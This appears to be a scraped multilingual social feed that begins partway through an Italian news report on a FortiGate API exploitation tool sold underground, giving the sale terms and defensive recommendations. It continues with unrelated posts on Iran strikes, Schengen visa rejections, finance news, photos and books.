- Token VPN e ID di sessioni IPSec
- Backup completi di configurazione dei dispositivi
Impatto e diffusione e prezzo di vendita
Le implicazioni sono gravi e includono:
- Accesso alla rete interna e lateral movement
- Furto di configurazioni, backup e credenziali
- Compromissione di comunicazioni VPN in corso
- Possibilità di escalation attraverso token utente legittimi
Il tool risulta testato su numerose versioni di FortiOS: v6.0.9, 6.2.5, 7.0.4, 7.2.1, 7.2.6, 6.2.x e altre.
- Prezzo richiesto: 12.000 dollari
- Pagamento in criptovaluta
- Trattativa tramite escrow per garantire (almeno formalmente) la transazione
- Forniti alcuni sample tramite link temporaneo su “send.exploit.in”
- L’autore avverte di contattarlo solo in caso di reale intenzione d’acquisto
Contromisure e raccomandazioni
Le organizzazioni che utilizzano FortiGate devono agire immediatamente, soprattutto se:
- Le interfacce API sono esposte direttamente su Internet
- I dispositivi eseguono versioni obsolete del firmware
- I portali VPN/SSL non sono configurati correttamente
Raccomandazioni operative:
- Eseguire un audit immediato delle interfacce esposte
- Aggiornare tutti i dispositivi alla versione FortiOS più recente e supportata
- Limitare l’accesso alle API solo a indirizzi IP interni o autorizzati
- Abilitare i log API per individuare attività sospette
- Revocare e rigenerare i token VPN attivi, verificando l’integrità delle configurazioni
Conclusioni
La disponibilità di un exploit automatizzato come questo sul mercato underground evidenzia una volta di più quanto sia critico esporre anche solo parzialmente interfacce di gestione non adeguatamente protette. In questo caso, l’accesso non autenticato alle API FortiGate può portare al completo compromesso di una rete.
L'articolo FortiGate sotto attacco: in vendita tool per lo sfruttamento massivo delle API esposte proviene da il blog della sicurezza informatica.
Morgan Stanley’s Wilson Says Geopolitical Selloffs Fade Fast
https://www.bloomberg.com/news/articles/2025-06-23/morgan-stanley-s-wilson-says-geopolitical-selloffs-fade-fast?utm_source=flipboard&utm_medium=activitypub
Posted into Middle East @middle-east-bloomberg
No Kings (14 June 2025 in Jersey City, New Jersey)
More photos at Flickr:
flickr.com/photos/jbm0/albums/…
#NoKings #protest #rally #demonstration #NewJersey #JerseyCity #photograph #photographs #photography #nofaces
No Kings (Jersey City, NJ)
14 June 2025: the No Kings gathering in Jersey City, New JerseyJeff Moore (Flickr)
Tim Chambers reshared this.
🎯 ■ Una española vuelve a España después de vivir años en el extranjero y cuenta sin tapujos cómo es esta realidad ■ "Pero de eso nadie te habla".
huffingtonpost.es/virales/una-…
#tiktok #vivirenelextranjero #virales #espana #viajes #espanolesporelmundo
Una española vuelve a España después de vivir años en el extranjero y cuenta sin tapujos cómo es esta realidad
La usuaria de TikTok Laura (@laura.argal), una chica española que crea contenido sobre emigrar, volver y readaptarse, ha subido un vídeo a su cuenta de TikTok contando sin tapujos cómo es la realidad de volver a España.Alba Rodríguez Morales (El HuffPost)
Il drammatico infortunio di Tyrese Haliburton durante l'ultima partita delle finali di NBA - Il Post
https://www.ilpost.it/flashes/video-infortunio-tyrese-haliburton-indiana-pacers-finals-nba-2025/?utm_source=flipboard&utm_medium=activitypub
Pubblicato su News @news-ilPost
News reshared this.
“L’evoluzionista riluttante”: il Darwin quotidiano raccontato da David Quammen
"L'evoluzionista riluttante" è un ritratto intimo e psicologico del padre della teoria dell’evoluzione, colto nelle sue ansie, contraddizioni e straordinarie intuizioni domestiche: il vero viaggio non fu sul Beagle, ma dentro sé stesso
articoli di Gionata Stancher
Gionata Stancher è un ricercatore e divulgatore scientifico che lavora come curatore della sezione di Zoologia della Fondazione Museo Civico di Rovereto.Gionata Stancher (Pikaia - Il portale dell\'evoluzione)
I just did a speed test from my current bandwidth provider. As I've said before I use 4G plus Internet because it's magnitudes faster than the 10MBit/s which the xDSL provider gives with which are the most I can get 3.2 TBytes per month
1TB=1024GB
I will never be able to fill a proper hard drive in one month at such speeds. A proper hard drive is 16 TB at minimum
The speeds are oké for this Point in Time
#ISP #xDSL #4G #LTE #network #data #speed
The image displays a screenshot of the OpenSpeedTest app interface. At the top, the app's logo and name "OpenSpeedTest™" are prominently featured. Below the logo, the text reads "HTML5 Internet Speed Test. no Flash or Java! Broadband Speed Test That Works on Any Web Browser." The main visual element is a circular gauge with a blue waveform, indicating the test's progress, which shows "All done" at the center. The gauge's scale ranges from 0 to over 1000, with the current speed at 0 Mbps. Below the gauge, the test results are displayed: "DOWNLOAD 35.9 Mbps," "PING 104 Jitter 2 ms," and "UPLOAD 9.3 Mbps." The text at the bottom states, "Designed to replicate your real-world connection speed! THE MOST ACCURATE AND POWERFUL NETWORK SPEED TEST TOOL. Run a Network Speed Test From Any Device, Including Phones, TVs, Consoles, and Computers." The app's website, "openspeedtest.com," is shown at the bottom, along with a navigation bar featuring a home icon, a padlock icon, and a menu icon. The device's status bar at the top shows the time as 04:27, 4G connectivity, and a battery level of 78%.
Provided by @altbot, generated privately and locally using Ovis2-8B
🌱 Energy used: 0.310 Wh
Zwei utopische Erzählungen über eine Zeit, in der im Mittleren Osten Frieden herrscht und ein Grundeinkommen die Lebensbedürfnisse der Menschen sichert. Der Mensch bleibt sich jedoch treu und auch das gesicherte Leben kein Paradies. 
#Lesen #Literatur #2025reads #Israel #Utopie #Erzählung #Buch
Kurz vorgestellt auf meinem #Blog: 👇
schreibgewitter.de/assaf-gavro…
Euro-Zone Private Sector Near Stagnation on Global Uncertainty
https://www.bloomberg.com/news/articles/2025-06-23/euro-zone-private-sector-near-stagnation-on-global-uncertainty?utm_source=flipboard&utm_medium=activitypub
Posted into Business @business-bloomberg
Europa heeft geen gebrek aan verdediging, het ís al tot de tanden gewapend, meent de Britse onderzoeker Khem Rogaly. Nog meer defensie maakt ons alleen maar afhankelijker van de Amerikanen en – erger – destabiliseert onze democratieën en het klimaat.
Lees verder: corr.es/d77dfc
L'immagine mostra un angolo di un ufficio con un tavolo di legno chiaro. Sul tavolo ci sono due computer: un laptop aperto con uno sfondo di una città illuminata e un monitor Samsung che mostra un software di design grafico. Accanto al monitor, c'è un mouse e un taccuino. Sul tavolo ci sono anche occhiali, una matita, un trapano e un foglio con una griglia. Sullo sfondo, c'è un pannello di gomma pieno di post-it, cartoline e disegni, e un mappamondo appeso alla parete. L'ambiente sembra essere un spazio di lavoro creativo, con vari strumenti e materiali disposti ordinatamente.
Fornito da @altbot, generato localmente e privatamente utilizzando Ovis2-8B
🌱 Energia utilizzata: 0.213 Wh
Cartoonjournaal 23 juni 2025.
Lees het bijbehorende bericht op mijn LinkedIn profiel:
linkedin.com/posts/lokocartoon…
#cartoonjournaal #humor #actualiteit #nieuws
#Trump #NAVOtop #Iran #oorlog #Netanyahu #waardigheid #fatsoen #diplomatiek #bombaderdement #G7 #Oekraïne #Israël #Gaza
Het gaat om veiligheid en het gaat om geld, komende week op de NAVO-top in Den Haag.
Het gaat om veiligheid en het gaat om geld, komende week op de NAVO-top in Den Haag. Maar het gaat inmiddels ook om waardigheid en fatsoen.Lodewijk Koster (www.linkedin.com)
Behind the Scenes at the Python Software Foundation reveals an incredible 2024: just 3 developers authored 750+ pull requests while the ecosystem served 526 BILLION downloads (1.11 exabytes!). Meanwhile, the new malware report button got clicked 2000+ times. Busy year for everyone! 🐍
developers.slashdot.org/story/…
#Python #OpenSource #Programming
Behind the Scenes at the Python Software Foundation - Slashdot
The Python Software Foundation ("made up of, governed, and led by the community") does more than just host Python and its documnation, the Python Package Repository, and the development workflows of core CPython developers.developers.slashdot.org
Occidente tossico: il terrore come metodo, dio come alibi | Left
left.it/2025/06/23/occidente-t…
> Dio, bombe e terrore. Netanyahu e Trump gemelli per niente diversi
securityaffairs.com/179239/cyb…
#securityaffairs #hacking #malware
Iran-Linked Threat Actors Cyber Fattah Leak Visitors and Athletes' Data from Saudi Games
Cyber Fattah leaked thousands of records on athletes and visitors from past Saudi Games, per U.S.-based cybersecurity firm Resecurity.Pierluigi Paganini (Security Affairs)
Cybersecurity & cyberwarfare reshared this.
Young Great Blue Heron
Photo of the Day
from my daily photo blog
#Birds #photography #wildphotography #birdphotography #WIldlifePhotography #Wildlife
like this
Visti Schengen, porta chiusa per molti Africani.
Per molti africani sognare di visitare l’Europa per turismo, conferenze, istruzione o riunioni familiari si sta trasformando in una lotta sempre più difficile. Le ultime statistiche della Commissione Europea rivelano una realtà preoccupante: i richiedenti africani affrontano alcuni dei tassi di rifiuto più elevati del mondo nel tentativo di ottenere il visto Schengen.
Nel 2024, sono stati migliaia i viaggiatori africani i quali hanno visto infrangersi le loro speranze di viaggio. Secondo dati ufficiali, paesi come Comore, Guinea-Bissau, Senegal, Nigeria e Ghana hanno registrato tassi di rifiuto oscillanti tra il 45% e il 63%, rendendoli tra i più colpiti a livello globale.
Quest’anno, la zona Schengen, ha ricevuto oltre 11,7 milioni di domande di visto per soggiorni brevi. Sebbene la domanda globale sia aumentata del 13,6%, la porta è rimasta saldamente chiusa per molti africani.
Oltre alla beffa, anche il danno.
Ogni domanda di visto Schengen costa 90 euro (circa 100 dollari americani), indipendentemente dall’esito. Si tratta di una tassa non rimborsabile che deve essere pagata anche quando la domanda viene respinta, spesso con spiegazioni minime.
Secondo un’analisi del LAGO Collective, gli africani hanno perso un patrimonio stimato di 60 milioni di euro (67,5 milioni di dollari) solo nel 2024 a causa di domande respinte. Si tratta di denaro speso non per viaggiare, bensì a causa della burocrazia.
“Le nazioni più povere del mondo stanno pagando i paesi più ricchi per non essere accettate”, afferma Marta Foresti, fondatrice della succitata associazione che ha sede nel Regno Unito. “Più povero è il paese di origine, maggiori sono i tassi di rifiuto.” Dal punto di vista europeo, la spiegazione è però piuttosto evidente: il timore che una volta scaduto il visto, il visitatore faccia perdere le proprie tracce e non rientri più nella nazione d’origine.
I dati della Commissione Europea rivelano quanto sia diseguale il peso dei rifiuti:
– Comore: 62,8%
– Guinea-Bissau: 47,0%
– Senegal: 46,8%
– Nigeria: 45,9%
– Ghana: 45,5%
– Congo-Brazzaville: 43,0%
– Mali: circa 43%
– Guinea: 41,1%
– Burundi: 40,0%
– Etiopia: 36,1%
A titolo di confronto, il tasso medio di rifiuto globale si attesta intorno al 18%, rendendo i numeri africani eccezionalmente elevati.
Più di Una Questione Burocratica
Le ambasciate europee insistono sul fatto che ogni domanda è valutata singolarmente, considerando aspetti come lo scopo della visita, i mezzi finanziari e la volontà del richiedente di tornare a casa. Tuttavia, i critici sostengono che il processo rimane opaco, con poca responsabilità.
“Questi alti tassi di rifiuto non sono solo amministrativi, ma sintomatici di problemi più profondi: disuguaglianza, sospetto e pregiudizio sistemico,” aggiunge Foresti.
Molti richiedenti affermano di presentare regolarmente tutti i documenti necessari, dalle lettere di impiego ai bilanci bancari e all’assicurazione di viaggio, solo per ricevere dinieghi vaghi e senza chiarimenti. In alcuni casi, le persone vengono ripetutamente negate, anche per motivi di viaggio legittimi come conferenze o eventi familiari.
Mentre i governi africani costruiscono partenariati con l’Europa in vari settori, tra cui commercio, istruzione e tecnologia, le barriere al movimento contrastano fortemente con la retorica di cooperazione. Nel frattempo, i cittadini europei affrontano poca resistenza quando viaggiano in Africa, sollevando interrogativi difficili su equità, reciprocità e rispetto.
In un mondo globalizzato dove la mobilità spesso equivale a opportunità, gli africani si trovano esclusi non perché manchino di intenzione o preparazione, ma perché il sistema sembra sempre più orientato contro di loro. Con la pressione che aumenta per una riforma dei visti e una maggiore trasparenza, la speranza è che le voci e i portafogli africani non continuino a sopportare i costi più elevati per i risultati più bassi.
Fonte: africanews.com
Il blogverso italiano di Wordpress reshared this.
肯泰罗使用了肇事逃逸!
The answer also applies to the #Zionist abomination.
FortiGate sotto attacco: in vendita tool per lo sfruttamento massivo delle API esposte
📌 Link all'articolo : redhotcyber.com/post/fortigate…
#redhotcyber #hacking #cti #ai #online #it #cybercrime #cybersecurity #technology #news #cyberthreatintelligence #innovation #privacy
FortiGate sotto attacco: in vendita tool per lo sfruttamento massivo delle API esposte
In vendita su un forum underground un tool per sfruttare le API FortiGate esposte: oltre 170 endpoint vulnerabili e accesso completo ai firewall compromessi.Redazione RHC (Red Hot Cyber)
Cybersecurity & cyberwarfare reshared this.
The Night Chancellor Merz Changed His Mind About Donald Trump
After Trump publicly belittled Zelenskyy and rumors swirled of a U.S. NATO exit, Germany’s chancellor-elect Friedrich Merz ditched his debt-brake pledge, backing roughly €1 trillion in new borrowing to rearm Germany and speed an independent European defense.
s1m0n4 reshared this.
In effetti l’atteggiamento de «L’Ora» a livello pubblico era stato, se possibile, ancor più critico. Al direttore andava attribuito un articolo non firmato dell’8 luglio 1963, intitolato “Politica e violenza a Palermo”, che aveva esplicitamente accusato la giunta palermitana di
This 88-Year-Old Reporter Predicted How US Would Attack Iran And It has Happened Exactly
Seymour Hersh. Nearly 88, running his Substack, and still outpacing governments, intelligence leaks, and every newsroom, Hersh once again proved why he’s a legend in investigative journalism.
On June 19, he published a detailed exposé revealing that U.S. B-2 bombers and naval forces were preparing a “coordinated assault” on Iran’s key underground nuclear sites at Fordow, Natanz, and Isfahan. He cited unnamed intelligence sources warning the attack was imminent and happening with almost no oversight from Congress or NATO allies.
Many brushed it off. Some called it far-fetched. On Sunday, when President Donald Trump confirmed the strikes and declared the targets “obliterated,” Hersh had already been proven right, two days ahead of the world.
This isn’t Hersh’s first time uncovering what others missed. His 2023 scoop on the Nord Stream pipeline sabotage, which he linked to U.S. operations, followed a similar path: ignored at first, later echoed by leaked investigations. The Iran bombing story played out just the same: initial silence, disbelief, then confirmation.
But Hersh’s reporting also points to a bigger shift. More than 60% of Americans now get their breaking news from social media, newsletters, and independent platforms. The reason? Speed, raw reporting, and growing distrust in traditional journalism. Hersh calls it like he sees it, often accusing mainstream reporters of being too close to power to ask real questions.
This 88-Year-Old Reporter Predicted How US Would Attack Iran And It has Happened Exactly
Hersh exposed US B-2 bombers and naval forces preparing a coordinated attack on Iran's nuclear sites, citing unnamed intelligence sources, with no oversight from Congress or NATO allies.Shruti Sneha (Republic World)
I posted Hersh’s article in full four days ago: lemmy.ml/post/31954761
Seymour Hersh: What I’ve been told is coming in Iran
Full text of paywalled article below.This is a report on what is most likely to happen in Iran, as early as this weekend, according to Israeli insiders and American officials I’ve relied upon for decades. It will entail heavy American bombing. I have vetted this report with a longtime US official in Washington, who told me that all will be “under control” if Iran’s Supreme Leader Ali Khamenei “departs.” Just how that might happen, short of his assassination, is not known. There has been a great deal of talk about American firepower and targets inside Iran, but little practical thinking, as far I can tell, about how to remove a revered religious leader with an enormous following.
I have reported from afar on the nuclear and foreign policy of Israel for decades. My 1991 book The Samson Option told the story of the making of the Israeli nuclear bomb and America’s willingness to keep the project secret. The most important unanswered question about the current situation will be the response of the world, including that of Vladimir Putin, the Russian president who has been an ally of Iran’s leaders.
The United States remains Israel’s most important ally, although many here and around the world abhor Israel’s continuing murderous war in Gaza. The Trump administration is in full support of Israel’s current plan to rid Iran of any trace of a nuclear weapons program while hoping the ayatollah-led government in Tehran will be overthrown.
I have been told that the White House has signed off on an all-out bombing campaign in Iran, but the ultimate targets, the centrifuges buried at least eighty meters below the surface at Fordow, will, as of this writing, not be struck until the weekend. The delay has come at Trump’s insistence because the president wants the shock of the bombing to be diminished as much as possible by the opening of Wall Street trading on Monday. (Trump took issue on social media this morning with a Wall Street Journal report that said he had decided on the attack on Iran, writing that he had yet to decide on a path forward.)
Fordow is home to the remaining majority of Iran’s most advanced centrifuges that have produced, according to recent reports of the International Atomic Energy Agency, to which Iran is a signatory, nine hundred pounds of uranium enriched to 60 percent, a short step from weapons-grade levels.
The most recent Israeli bombing attacks on Iran have made no attempts to destroy the centrifuges at Fordow, which are stored at least eighty meters underground. It has been agreed, as of Wednesday, that US bombers carrying bunker bombs capable of penetrating to that depth, will begin attacking the Fordow facility this weekend.
The delay will give US military assets throughout the Middle East and the Eastern Mediterranean—there are more than two dozen US Air Force bases and Navy ports in the region—a chance to prepare for possible Iranian retaliation. The assumption is that Iran still has some missile and air force capability that will be on US bombing lists. “This is a chance to do away with this regime once and for all,” an informed official told me today, “and so we might as well go big.” He said, however, “that it will not be carpet bombing.”
The planned weekend bombing will also have new targets: the bases of the Republican Guards, which have countered those campaigning against the revolutionary leadership since the violent overthrow of the shah of Iran in early 1979.
The Israeli leadership under Prime Minister Benjamin Netanyahu hopes that the bombings will provide “the means of creating an uprising” against Iran’s current regime, which has shown little tolerance for those who defy the religious leadership and its edicts. Iranian police stations will be struck. Government offices that house files on suspected dissenters in Iran will also be attacked.
The Israelis apparently also hope, so I gather, that Khamenei will flee the country and not make a stand until the end. I was told that his personal plane left Tehran airport headed for Oman early Wednesday morning, accompanied by two fighter planes, but it is not known whether he was aboard.
Only two thirds of Iran’s population of 90 million are Persians. The largest minority groups include Azeris, many of whom have long-standing covert ties to the Central Intelligence Agency, Kurds, Arabs, and Baluchis. Jews make up a small minority group there, too. (Azerbaijan is the site of a large secret CIA base for operations in Iran.)
Bringing back the shah’s son, now living in exile in near Washington, has never been considered by the American and Israeli planners, I was told. But there has been talk among the White House planning group that includes Vice President J.D. Vance, of installing a moderate religious leader to run the country if Khamenei is deposed. The Israelis bitterly objected to the idea. “They don’t give a shit on the religious issue, but demand a political puppet to control,” the longtime US official said. “We are split with the Izzies on this. Result would be permanent hostility and future conflict in perpetuity, Bibi desperately trying to draw US in as their ally against all things Muslim, using the plight of the citizens as propaganda bait.”
There is the hope in the American and Israeli intelligence communities, I was told, that elements of the Azeri community will join in a popular revolt against the ruling regime, should one develop during the continued Israeli bombing. There also is the thought that some members of the Revolutionary Guard would join in what I was told might be “a democratic uprising against the ayatollahs”—a long-held aspiration of the US government. The sudden and successful overthrow of Bashar al-Assad in Syria was cited as a potential model, although Assad’s demise came after a long civil war.
It is possible that the result of the massive Israeli and US bombing attack could leave Iran in a state of permanent failure, as happened after the Western intervention in Libya in 2011. That revolt resulted in the brutal murder of Muammar Gaddafi, who had kept the disparate tribes there under control. The futures of Syria, Iraq, and Lebanon, all victims of repeated outside attacks, are far from settled.
Donald Trump clearly wants an international win he can market. To accomplish that, he and Netanyahu are taking America to places it has never been.
Un libro: Il mio traditore
A partire dalla sua vera amicizia con Denis Donaldson, leader dell’IRA e dello Sinn Féin, Chalandon racconta di Antoine, un giovane parigino con una passione per la musica tradizionale irlandese, che arriva a Belfast nel 1975 con in mente le parole di un amico: se non conosci il Nord non conosci l’Irlanda
Qui l’immagine patinata che aveva del paese lascia il posto a una terra di scontri, di morte, ma anche di amicizia
Un libro: Il mio traditore
A partire dalla sua vera amicizia con Denis Donaldson, leader dell’IRA e dello Sinn Féin, Sorj Chalandon racconta di Antoine, un giovane liutaio parigino con una passione per la musica tradizionale…Paoblog.net
theguardian.com/us-news/2025/j…
Senator Padilla recounts the experience of being suddenly attacked and handcuffed by agents, while the agents who had brought him there said nothing about who he was.
‘It’s time to wake up’: Padilla recounts being handcuffed at Noem briefing in emotional speech
California senator details being restrained and warns of how democratic norms can slip away when power is uncheckedLauren Gambino (The Guardian)
@DLR & @awi show how food production could work in extreme environments.
🔗 Find out how: helmholtz.de/en/about-us/helmh… #Helmholtz30
Story #28
In the course of its five-year mission in the Antarctic, the DLR greenhouse EDEN ISS produced more than a metric ton of fresh vegetables – forHelmholtz-Gemeinschaft Deutscher Forschungszentren
reshared this
La famiglia Martini, i cui capostipiti furono Lorenzo Giovanni Battista Martini e Maria Giacinta Carmela Lanzani, si componeva di ben dodici figli, sei maschi e sei femmine: Maria, Augusto, Maddalena Virginia, Domenico, Alessandro, Giuseppe, Teresa, Lidia, Renata, Mario, Carla Liliana e Giancarlo <123. Abitano a
US ‘primary force’ behind Israel’s acts of aggression against Iran: Pezeshkian
Iran’s president says Tehran’s decisive response to the Israeli regime’s acts of aggression forced US to “step in” and attack the peaceful nuclear sites.PressTV
Berliner Regierung kündigt eine Reihe neuer Gesetzesvorhaben an
Mehr Kompetenzen für die Polizei, verbesserter Schutz für Opfer häuslicher Gewalt, höherer Landesmindestlohn, Vergesellschaftungen: Die Berliner Regierungskoalition hat sich auf ihrer Klausur auf eine Reihe von Vorhaben geeinigt.www.rbb24.de
artist: Mathew Brady Studio, active 1844 - 1894
source: National Portrait Gallery
notes: The Frederick Hill Meserve Collection comprises more than five thousand […]
#Art #Design #Museum #Gallery #MastodonArt #MastoArt #Culture #Random
npg.si.edu/object/npg_NPG.81.M…
hwupgrade.it/news/sistemi-oper…
Bill Gates e Linus Torvalds si sono incontrati per la prima volta: la foto che fa la storia
Bill Gates e Linus Torvalds si sono incontrati pubblicamente per la prima volta durante una cena informale ospitata da Mark Russinovich di Microsoft. Presente anche Dave Cutler, storico ingegnere di Windows.Hardware Upgrade
diggita - istanza lemmy reshared this.
A profile of Katie Haun, a former federal prosecutor turned a16z partner who later founded Haun Ventures and believes the GENIUS Act will make stablecoins safer (Connie Loizos/TechCrunch)
techcrunch.com/2025/06/22/the-…
techmeme.com/250623/p5#a250623…
The stablecoin evangelist: Katie Haun's fight for digital dollars | TechCrunch
In 2018, when Bitcoin was trading around $4,000 and most Americans, at least, thought cryptocurrency was a fad, Katie Haun found herself on a debate stage in Mexico City opposite Paul Krugman, the Nobel Prize-winning economist.Connie Loizos (TechCrunch)
Iran says US has 'blown up' any attempt to end the Israel-Iran conflict diplomatically
World leaders, including the EU and the UK, have called on Iran to engage in negotiations with the US and Israel.TheJournal.ie
Dans les villes françaises, les jumelages avec Israël sèment la discorde
mcinformactions.net/dans-les-v…
#israel #palestine #Hamas #Cisjordanie #Gaza
Dans les villes françaises, les jumelages avec Israël sèment la discorde - [mcInform@ctions]
Depuis plusieurs semaines, un débat fait rage dans plusieurs villes françaises : faut-il mettre fin aux jumelages avec des localités...mcinformactions.net
niccolo
in reply to nixCraft 🐧 • • •- YouTube
www.youtube.comArnaud Mangasaryan
in reply to nixCraft 🐧 • • •RIBBBITn3rding
in reply to nixCraft 🐧 • • •Max
in reply to nixCraft 🐧 • • •James Cameroun
in reply to nixCraft 🐧 • • •Zeki Çatav 🤔 ☕ 🕯️🎶
in reply to nixCraft 🐧 • • •🇺🇸 🇺🇦 🇮🇱 🐧 🥦
in reply to nixCraft 🐧 • • •Cyb3rBr4in_r00t 👾
in reply to nixCraft 🐧 • • •Harish
in reply to nixCraft 🐧 • • •Al & Val's Modern Homesteading
in reply to nixCraft 🐧 • • •Sibshops
in reply to nixCraft 🐧 • • •JamesTDG
in reply to nixCraft 🐧 • • •Hypertext MARKUP language
Merry Christmas
in reply to nixCraft 🐧 • • •JamesB192
in reply to nixCraft 🐧 • • •well, you can get it from porn sites.
/me ducks.
François @Prague
in reply to nixCraft 🐧 • • •kafilmao
in reply to nixCraft 🐧 • • •ʙᴇɴ ᴄᴏᴛᴛᴇяɪʟʟ
in reply to nixCraft 🐧 • • •Robin Barton
in reply to nixCraft 🐧 • • •eickot
in reply to nixCraft 🐧 • • •